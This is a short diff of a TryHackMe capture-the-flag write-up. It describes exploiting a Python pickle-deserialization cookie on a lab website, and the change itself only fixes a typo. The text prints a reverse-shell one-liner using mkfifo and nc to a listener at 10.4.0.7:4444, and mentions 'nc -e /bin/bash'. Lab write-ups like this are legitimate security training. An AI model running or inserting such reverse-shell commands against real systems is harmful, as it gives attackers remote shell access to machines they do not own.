ChrisPritchard/ctf-writeups/tryhackme/unbakedpie.md

 Enumeration revealed a single port, 5003.
 On that port was a website talking about pies and pickles, nice puns around python and the pickle serialization library.
 Sure enough, the search functionality would set a cookie with a pickle value.

 Exploiting this is a bit tricky, mainly because the website didn't respond to malformed cookies (it instead would crash generally if the search page is accessed via a GET).
-This defelected me for a bit, trying to find the right place where the cookie value was read.
+This deflected me for a bit, as I tried to find the right place where the cookie value was read.
 However, in actuality the value IS read on the GET /search, it just crashes anyway, so replacing the cookie and requesting this page is the entry point.

 The second issue was that the standard `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.4.0.7 4444 >/tmp/f` would fail, but I eventually discovered that plain `nc -e /bin/bash` worked.
 Always worth testing, even if this is rare.